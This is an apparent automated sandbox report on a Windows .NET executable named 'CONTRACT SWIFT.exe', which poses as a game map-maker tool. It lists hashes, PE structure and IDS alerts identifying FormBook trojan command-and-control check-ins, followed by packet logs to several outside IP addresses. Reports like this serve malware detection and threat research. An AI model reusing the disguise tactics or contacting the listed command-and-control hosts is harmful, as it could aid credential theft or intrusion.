SSDEEP:	12288:AEnaKgG9Vee+uAlccVD4C2vCk9S9QEP4myx3Hb16y2+wlh6ZEjE1W77ams4JepaN:5n/h9VeruAlvVDevrGgnXb5YHkUepvq
MD5:	DB181EBDB6F9F062A64BD94AAF2040C0
SHA1:	0B93B5045F8BE50B4D70F0CE3B353D61A3F398D0
SHA-256:	7E764E53424C41B68593B184364B18E22EEB77199532E6DD9B7D968CC7F4014D
SHA-512:	E41854A9E93FF820C0D30EC1093EA1FD9687C63C9C858B8B7A04F6356A55E4E940F6C58365A35B33BC7F35B69E2D9D04DAF89EF3E15485C0F17787CD3F5BFBB8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................R........... ........@.. ....................................@.....................................K........M...................`....................................................... ............... ..H............text...$.... ...................... ..`.sdata..............................@....rsrc....M.......N..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\hiCrWx.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\CONTRACT SWIFT.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.415631803214036
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	CONTRACT SWIFT.exe
File size:	1051136
MD5:	db181ebdb6f9f062a64bd94aaf2040c0
SHA1:	0b93b5045f8be50b4d70f0ce3b353d61a3f398d0
SHA256:	7e764e53424c41b68593b184364b18e22eeb77199532e6dd9b7d968cc7f4014d
SHA512:	e41854a9e93ff820c0d30ec1093ea1fd9687c63c9c858b8b7a04f6356a55e4e940f6c58365a35b33bc7f35b69e2d9d04daf89ef3e15485c0f17787cd3f5bfbb8
SSDEEP:	12288:AEnaKgG9Vee+uAlccVD4C2vCk9S9QEP4myx3Hb16y2+wlh6ZEjE1W77ams4JepaN:5n/h9VeruAlvVDevrGgnXb5YHkUepvq
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................R........... ........@.. ....................................@................................

File Icon


Icon Hash:	ec8633512db2d0f1

Static PE Info

General
Entrypoint:	0x4fd21e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60B41F87 [Sun May 30 23:28:07 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfd1d0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x100000	0x4d80	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x106000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xfb224	0xfb400	False	0.745170631219	data	7.43962798959	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.sdata	0xfe000	0x1e8	0x200	False	0.859375	data	6.61043562316	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x100000	0x4d80	0x4e00	False	0.373096955128	data	5.87679632055	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x106000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x100130	0x4228	dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON	0x104358	0x14	data
RT_VERSION	0x10436c	0x450	data
RT_MANIFEST	0x1047bc	0x5c1	XML 1.0 document, UTF-8 Unicode (with BOM) text

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	GNU GPL v2 License
Assembly Version	1.4.7821.4443
InternalName	DictionaryBase.exe
FileVersion	1.4.7821.4443
CompanyName	CrystAlien Redux Project
LegalTrademarks
Comments	Create custom levels for the CrystAlien Conflict game.
ProductName	CAMM (Crystal Alien Map Maker)
ProductVersion	1.4.7821.4443
FileDescription	CAMM (Crystal Alien Map Maker)
OriginalFilename	DictionaryBase.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/31/21-21:47:10.198590	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.6	208.110.82.29
05/31/21-21:47:10.198590	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.6	208.110.82.29
05/31/21-21:47:10.198590	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.6	208.110.82.29
05/31/21-21:47:21.118276	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49754	34.102.136.180	192.168.2.6
05/31/21-21:47:26.447939	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49755	23.227.38.74	192.168.2.6
05/31/21-21:47:31.608781	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49756	80	192.168.2.6	217.160.0.220
05/31/21-21:47:31.608781	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49756	80	192.168.2.6	217.160.0.220
05/31/21-21:47:31.608781	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49756	80	192.168.2.6	217.160.0.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 31, 2021 21:47:10.035708904 CEST	49752	80	192.168.2.6	208.110.82.29
May 31, 2021 21:47:10.198302031 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.198390961 CEST	49752	80	192.168.2.6	208.110.82.29
May 31, 2021 21:47:10.198590040 CEST	49752	80	192.168.2.6	208.110.82.29
May 31, 2021 21:47:10.358336926 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.510684013 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.510737896 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.510773897 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.510813951 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.510850906 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.510898113 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.510931969 CEST	49752	80	192.168.2.6	208.110.82.29
May 31, 2021 21:47:10.510940075 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.510978937 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.511018038 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.511046886 CEST	49752	80	192.168.2.6	208.110.82.29
May 31, 2021 21:47:10.511055946 CEST	49752	80	192.168.2.6	208.110.82.29
May 31, 2021 21:47:10.511055946 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.511194944 CEST	49752	80	192.168.2.6	208.110.82.29
May 31, 2021 21:47:10.669900894 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.669965029 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.670003891 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.670042038 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.670078993 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.670100927 CEST	49752	80	192.168.2.6	208.110.82.29
May 31, 2021 21:47:10.670126915 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.670129061 CEST	49752	80	192.168.2.6	208.110.82.29
May 31, 2021 21:47:10.670171976 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.670192003 CEST	49752	80	192.168.2.6	208.110.82.29
May 31, 2021 21:47:10.670209885 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.670239925 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:10.670344114 CEST	49752	80	192.168.2.6	208.110.82.29
May 31, 2021 21:47:10.670356035 CEST	49752	80	192.168.2.6	208.110.82.29
May 31, 2021 21:47:10.670437098 CEST	49752	80	192.168.2.6	208.110.82.29
May 31, 2021 21:47:10.829215050 CEST	80	49752	208.110.82.29	192.168.2.6
May 31, 2021 21:47:15.757002115 CEST	49753	80	192.168.2.6	192.0.78.25
May 31, 2021 21:47:15.798804045 CEST	80	49753	192.0.78.25	192.168.2.6
May 31, 2021 21:47:15.799156904 CEST	49753	80	192.168.2.6	192.0.78.25
May 31, 2021 21:47:15.799329042 CEST	49753	80	192.168.2.6	192.0.78.25
May 31, 2021 21:47:15.841315985 CEST	80	49753	192.0.78.25	192.168.2.6
May 31, 2021 21:47:15.841366053 CEST	80	49753	192.0.78.25	192.168.2.6
May 31, 2021 21:47:15.841392994 CEST	80	49753	192.0.78.25	192.168.2.6
May 31, 2021 21:47:15.841703892 CEST	49753	80	192.168.2.6	192.0.78.25
May 31, 2021 21:47:15.841825008 CEST	49753	80	192.168.2.6	192.0.78.25
May 31, 2021 21:47:15.883641958 CEST	80	49753	192.0.78.25	192.168.2.6
May 31, 2021 21:47:20.937886953 CEST	49754	80	192.168.2.6	34.102.136.180
May 31, 2021 21:47:20.979989052 CEST	80	49754	34.102.136.180	192.168.2.6
May 31, 2021 21:47:20.980099916 CEST	49754	80	192.168.2.6	34.102.136.180
May 31, 2021 21:47:20.980269909 CEST	49754	80	192.168.2.6	34.102.136.180
May 31, 2021 21:47:21.022365093 CEST	80	49754	34.102.136.180	192.168.2.6
May 31, 2021 21:47:21.118275881 CEST	80	49754	34.102.136.180	192.168.2.6
May 31, 2021 21:47:21.118310928 CEST	80	49754	34.102.136.180	192.168.2.6
May 31, 2021 21:47:21.118635893 CEST	49754	80	192.168.2.6	34.102.136.180
May 31, 2021 21:47:21.118967056 CEST	49754	80	192.168.2.6	34.102.136.180
May 31, 2021 21:47:21.161917925 CEST	80	49754	34.102.136.180	192.168.2.6
May 31, 2021 21:47:26.218494892 CEST	49755	80	192.168.2.6	23.227.38.74
May 31, 2021 21:47:26.262258053 CEST	80	49755	23.227.38.74	192.168.2.6
May 31, 2021 21:47:26.262428999 CEST	49755	80	192.168.2.6	23.227.38.74
May 31, 2021 21:47:26.262584925 CEST	49755	80	192.168.2.6	23.227.38.74
May 31, 2021 21:47:26.306117058 CEST	80	49755	23.227.38.74	192.168.2.6
May 31, 2021 21:47:26.447938919 CEST	80	49755	23.227.38.74	192.168.2.6
May 31, 2021 21:47:26.447997093 CEST	80	49755	23.227.38.74	192.168.2.6
May 31, 2021 21:47:26.448035955 CEST	80	49755	23.227.38.74	192.168.2.6
May 31, 2021 21:47:26.448072910 CEST	80	49755	23.227.38.74	192.168.2.6
May 31, 2021 21:47:26.448101044 CEST	80	49755	23.227.38.74	192.168.2.6
May 31, 2021 21:47:26.448128939 CEST	80	49755	23.227.38.74	192.168.2.6
May 31, 2021 21:47:26.448360920 CEST	49755	80	192.168.2.6	23.227.38.74
May 31, 2021 21:47:26.448446989 CEST	49755	80	192.168.2.6	23.227.38.74
May 31, 2021 21:47:26.448457003 CEST	49755	80	192.168.2.6	23.227.38.74
May 31, 2021 21:47:31.562645912 CEST	49756	80	192.168.2.6	217.160.0.220
May 31, 2021 21:47:31.608474016 CEST	80	49756	217.160.0.220	192.168.2.6
May 31, 2021 21:47:31.608613014 CEST	49756	80	192.168.2.6	217.160.0.220
May 31, 2021 21:47:31.608781099 CEST	49756	80	192.168.2.6	217.160.0.220
May 31, 2021 21:47:31.654581070 CEST	80	49756	217.160.0.220	192.168.2.6
May 31, 2021 21:47:31.662095070 CEST	80	49756	217.160.0.220	192.168.2.6
May 31, 2021 21:47:31.662133932 CEST	80	49756	217.160.0.220	192.168.2.6
May 31, 2021 21:47:31.662151098 CEST	80	49756	217.160.0.220	192.168.2.6
May 31, 2021 21:47:31.662441969 CEST	49756	80	192.168.2.6	217.160.0.220
May 31, 2021 21:47:31.662585020 CEST	49756	80	192.168.2.6	217.160.0.220
May 31, 2021 21:47:31.710561037 CEST	80	49756	217.160.0.220	192.168.2.6
May 31, 2021 21:47:36.842710972 CEST	49759	80	192.168.2.6	52.14.32.15
May 31, 2021 21:47:36.980556965 CEST	80	49759	52.14.32.15	192.168.2.6
May 31, 2021 21:47:36.980701923 CEST	49759	80	192.168.2.6	52.14.32.15
May 31, 2021 21:47:36.980860949 CEST	49759	80	192.168.2.6	52.14.32.15
May 31, 2021 21:47:37.118405104 CEST	80	49759	52.14.32.15	192.168.2.6
May 31, 2021 21:47:37.119092941 CEST	80	49759	52.14.32.15	192.168.2.6
May 31, 2021 21:47:37.119107962 CEST	80	49759	52.14.32.15	192.168.2.6
May 31, 2021 21:47:37.119410038 CEST	49759	80	192.168.2.6	52.14.32.15
May 31, 2021 21:47:37.119457006 CEST	49759	80	192.168.2.6	52.14.32.15
May 31, 2021 21:47:37.257056952 CEST	80	49759	52.14.32.15	192.168.2.6
May 31, 2021 21:47:43.008927107 CEST	49763	80	192.168.2.6	91.184.0.43
May 31, 2021 21:47:43.058181047 CEST	80	49763	91.184.0.43	192.168.2.6
May 31, 2021 21:47:43.058548927 CEST	49763	80	192.168.2.6	91.184.0.43
May 31, 2021 21:47:43.109642982 CEST	49763	80	192.168.2.6	91.184.0.43
May 31, 2021 21:47:43.198208094 CEST	80	49763	91.184.0.43	192.168.2.6
May 31, 2021 21:47:43.621515036 CEST	49763	80	192.168.2.6	91.184.0.43
May 31, 2021 21:47:43.710365057 CEST	80	49763	91.184.0.43	192.168.2.6
May 31, 2021 21:47:45.355377913 CEST	80	49763	91.184.0.43	192.168.2.6
May 31, 2021 21:47:45.355490923 CEST	49763	80	192.168.2.6	91.184.0.43
May 31, 2021 21:47:53.720360994 CEST	49764	80	192.168.2.6	172.67.155.68
May 31, 2021 21:47:53.762218952 CEST	80	49764	172.67.155.68	192.168.2.6
May 31, 2021 21:47:53.762382984 CEST	49764	80	192.168.2.6	172.67.155.68
May 31, 2021 21:47:53.762582064 CEST	49764	80	192.168.2.6	172.67.155.68
May 31, 2021 21:47:53.804634094 CEST	80	49764	172.67.155.68	192.168.2.6
May 31, 2021 21:47:54.242822886 CEST	80	49764	172.67.155.68	192.168.2.6
May 31, 2021 21:47:54.242877960 CEST	80	49764	172.67.155.68	192.168.2.6
May 31, 2021 21:47:54.242906094 CEST	80	49764	172.67.155.68	192.168.2.6
May 31, 2021 21:47:54.242923975 CEST	80	49764	172.67.155.68	192.168.2.6
May 31, 2021 21:47:54.243354082 CEST	49764	80	192.168.2.6	172.67.155.68
May 31, 2021 21:47:54.243551016 CEST	49764	80	192.168.2.6	172.67.155.68
May 31, 2021 21:47:59.534550905 CEST	49766	80	192.168.2.6	154.208.179.46
May 31, 2021 21:47:59.729114056 CEST	80	49766	154.208.179.46	192.168.2.6
May 31, 2021 21:47:59.729464054 CEST	49766	80	192.168.2.6	154.208.179.46
May 31, 2021 21:47:59.729772091 CEST	49766	80	192.168.2.6	154.208.179.46
May 31, 2021 21:47:59.926212072 CEST	80	49766	154.208.179.46	192.168.2.6
May 31, 2021 21:48:00.028755903 CEST	80	49766	154.208.179.46	192.168.2.6
May 31, 2021 21:48:00.028799057 CEST	80	49766	154.208.179.46	192.168.2.6
May 31, 2021 21:48:00.029706001 CEST	49766	80	192.168.2.6	154.208.179.46
May 31, 2021 21:48:00.029756069 CEST	49766	80	192.168.2.6	154.208.179.46
May 31, 2021 21:48:00.225796938 CEST	80	49766	154.208.179.46	192.168.2.6
May 31, 2021 21:48:05.213610888 CEST	49767	80	192.168.2.6	208.91.197.27
May 31, 2021 21:48:05.377115011 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.377765894 CEST	49767	80	192.168.2.6	208.91.197.27
May 31, 2021 21:48:05.377948999 CEST	49767	80	192.168.2.6	208.91.197.27
May 31, 2021 21:48:05.582415104 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.657037973 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.657088995 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.657125950 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.657165051 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.657191038 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.657217026 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.657247066 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.657305956 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.657402992 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.657426119 CEST	49767	80	192.168.2.6	208.91.197.27
May 31, 2021 21:48:05.657449961 CEST	49767	80	192.168.2.6	208.91.197.27
May 31, 2021 21:48:05.657473087 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.657531977 CEST	49767	80	192.168.2.6	208.91.197.27
May 31, 2021 21:48:05.775249958 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.818260908 CEST	49767	80	192.168.2.6	208.91.197.27
May 31, 2021 21:48:05.823302984 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.823344946 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.823368073 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.823390007 CEST	80	49767	208.91.197.27	192.168.2.6
May 31, 2021 21:48:05.823539972 CEST	49767	80	192.168.2.6	208.91.197.27
May 31, 2021 21:48:05.823645115 CEST	49767	80	192.168.2.6	208.91.197.27
May 31, 2021 21:48:05.823787928 CEST	49767	80	192.168.2.6	208.91.197.27
May 31, 2021 21:48:05.988850117 CEST	80	49767	208.91.197.27	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 31, 2021 21:45:56.427726030 CEST	62044	53	192.168.2.6	8.8.8.8
May 31, 2021 21:45:56.485873938 CEST	53	62044	8.8.8.8	192.168.2.6
May 31, 2021 21:45:56.620431900 CEST	63791	53	192.168.2.6	8.8.8.8
May 31, 2021 21:45:56.679017067 CEST	53	63791	8.8.8.8	192.168.2.6
May 31, 2021 21:45:56.745855093 CEST	64267	53	192.168.2.6	8.8.8.8
May 31, 2021 21:45:56.821589947 CEST	53	64267	8.8.8.8	192.168.2.6
May 31, 2021 21:45:57.303591967 CEST	49448	53	192.168.2.6	8.8.8.8
May 31, 2021 21:45:57.353352070 CEST	53	49448	8.8.8.8	192.168.2.6
May 31, 2021 21:45:57.953687906 CEST	60342	53	192.168.2.6	8.8.8.8
May 31, 2021 21:45:58.016900063 CEST	53	60342	8.8.8.8	192.168.2.6
May 31, 2021 21:45:58.050657034 CEST	61346	53	192.168.2.6	8.8.8.8
May 31, 2021 21:45:58.101583004 CEST	53	61346	8.8.8.8	192.168.2.6
May 31, 2021 21:45:58.959587097 CEST	51774	53	192.168.2.6	8.8.8.8
May 31, 2021 21:45:59.009414911 CEST	53	51774	8.8.8.8	192.168.2.6
May 31, 2021 21:45:59.914453030 CEST	56023	53	192.168.2.6	8.8.8.8
May 31, 2021 21:45:59.965128899 CEST	53	56023	8.8.8.8	192.168.2.6
May 31, 2021 21:46:01.481095076 CEST	58384	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:01.530834913 CEST	53	58384	8.8.8.8	192.168.2.6
May 31, 2021 21:46:02.429173946 CEST	60261	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:02.479882002 CEST	53	60261	8.8.8.8	192.168.2.6
May 31, 2021 21:46:03.655488968 CEST	56061	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:03.708234072 CEST	53	56061	8.8.8.8	192.168.2.6
May 31, 2021 21:46:04.917272091 CEST	58336	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:04.967459917 CEST	53	58336	8.8.8.8	192.168.2.6
May 31, 2021 21:46:06.406580925 CEST	53781	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:06.458359003 CEST	53	53781	8.8.8.8	192.168.2.6
May 31, 2021 21:46:07.633709908 CEST	54064	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:07.683693886 CEST	53	54064	8.8.8.8	192.168.2.6
May 31, 2021 21:46:08.881619930 CEST	52811	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:08.931850910 CEST	53	52811	8.8.8.8	192.168.2.6
May 31, 2021 21:46:10.008774996 CEST	55299	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:10.071297884 CEST	53	55299	8.8.8.8	192.168.2.6
May 31, 2021 21:46:11.307034969 CEST	63745	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:11.358269930 CEST	53	63745	8.8.8.8	192.168.2.6
May 31, 2021 21:46:12.139226913 CEST	50055	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:12.202732086 CEST	53	50055	8.8.8.8	192.168.2.6
May 31, 2021 21:46:13.420589924 CEST	61374	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:13.481723070 CEST	53	61374	8.8.8.8	192.168.2.6
May 31, 2021 21:46:14.420955896 CEST	50339	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:14.475655079 CEST	53	50339	8.8.8.8	192.168.2.6
May 31, 2021 21:46:15.591825962 CEST	63307	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:15.647294044 CEST	53	63307	8.8.8.8	192.168.2.6
May 31, 2021 21:46:16.481249094 CEST	49694	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:16.531011105 CEST	53	49694	8.8.8.8	192.168.2.6
May 31, 2021 21:46:31.528301001 CEST	54982	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:31.604118109 CEST	53	54982	8.8.8.8	192.168.2.6
May 31, 2021 21:46:47.299144983 CEST	50010	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:47.444072962 CEST	53	50010	8.8.8.8	192.168.2.6
May 31, 2021 21:46:48.218525887 CEST	63718	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:48.278878927 CEST	53	63718	8.8.8.8	192.168.2.6
May 31, 2021 21:46:49.072032928 CEST	62116	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:49.200341940 CEST	53	62116	8.8.8.8	192.168.2.6
May 31, 2021 21:46:49.536685944 CEST	63816	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:49.602364063 CEST	53	63816	8.8.8.8	192.168.2.6
May 31, 2021 21:46:49.777123928 CEST	55014	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:49.840980053 CEST	53	55014	8.8.8.8	192.168.2.6
May 31, 2021 21:46:50.426728964 CEST	62208	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:50.575635910 CEST	53	62208	8.8.8.8	192.168.2.6
May 31, 2021 21:46:51.250341892 CEST	57574	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:51.310735941 CEST	53	57574	8.8.8.8	192.168.2.6
May 31, 2021 21:46:52.080051899 CEST	51818	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:52.140883923 CEST	53	51818	8.8.8.8	192.168.2.6
May 31, 2021 21:46:52.987323999 CEST	56628	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:53.052856922 CEST	53	56628	8.8.8.8	192.168.2.6
May 31, 2021 21:46:54.101991892 CEST	60778	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:54.176975012 CEST	53	60778	8.8.8.8	192.168.2.6
May 31, 2021 21:46:54.309422970 CEST	53799	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:54.444751024 CEST	53	53799	8.8.8.8	192.168.2.6
May 31, 2021 21:46:56.504329920 CEST	54683	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:56.566175938 CEST	53	54683	8.8.8.8	192.168.2.6
May 31, 2021 21:46:57.174535990 CEST	59329	53	192.168.2.6	8.8.8.8
May 31, 2021 21:46:57.236018896 CEST	53	59329	8.8.8.8	192.168.2.6
May 31, 2021 21:47:05.535461903 CEST	64021	53	192.168.2.6	8.8.8.8
May 31, 2021 21:47:05.598893881 CEST	53	64021	8.8.8.8	192.168.2.6
May 31, 2021 21:47:09.816098928 CEST	56129	53	192.168.2.6	8.8.8.8
May 31, 2021 21:47:10.028803110 CEST	53	56129	8.8.8.8	192.168.2.6
May 31, 2021 21:47:15.691540956 CEST	58177	53	192.168.2.6	8.8.8.8
May 31, 2021 21:47:15.755547047 CEST	53	58177	8.8.8.8	192.168.2.6
